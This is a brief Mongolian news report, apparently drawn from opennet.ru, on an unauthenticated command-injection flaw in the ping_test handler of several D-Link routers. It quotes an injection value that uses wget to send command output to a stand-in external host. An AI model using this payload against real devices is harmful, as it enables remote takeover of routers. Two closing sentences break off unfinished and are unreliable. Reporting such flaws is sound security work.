D-Link утасгүй чиглүүлэгчид
Сонирхолтой нь, програм хангамж хөгжүүлэгчдийн үзэж байгаагаар "ping_test" дуудлагыг зөвхөн баталгаажуулсны дараа хийх ёстой боловч бодит байдал дээр вэб интерфэйс рүү нэвтрэхээс үл хамааран ямар ч тохиолдолд дуудагддаг. Ялангуяа, apply_sec.cgi скриптэд нэвтэрч, “action=ping_test” параметрийг дамжуулах үед скрипт нь баталгаажуулалтын хуудас руу чиглүүлдэг боловч нэгэн зэрэг ping_test-тэй холбоотой үйлдлийг гүйцэтгэдэг. Кодыг ажиллуулахын тулд өөр нэг эмзэг байдлыг ping_test-д ашигласан бөгөөд энэ нь туршилтанд илгээсэн IP хаягийн зөв эсэхийг зөв шалгахгүйгээр ping хэрэгслийг дууддаг. Жишээлбэл, wget хэрэглүүрийг дуудаж, "echo 1234" командын үр дүнг гадаад хост руу шилжүүлэхийн тулд "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" параметрийг зааж өгөхөд л хангалттай. test.test/?$( echo 1234)".
Дараах загваруудад эмзэг байдал байгаа нь албан ёсоор батлагдсан:
- DIR-655 3.02b05 ба түүнээс дээш програм хангамжтай;
- DIR-866L 1.03b04 ба түүнээс дээш програм хангамжтай;
- DIR-1565 програм хангамж 1.01 ба түүнээс дээш хувилбартай;
- DIR-652 (програм хангамжийн асуудалтай хувилбаруудын талаар мэдээлэл өгөөгүй)
Эдгээр загваруудыг дэмжих хугацаа аль хэдийн дууссан тул D-Link
Энэ эмзэг байдал нь бас байсан гэдгийг хожим олж мэдсэн
Эх сурвалж: opennet.ru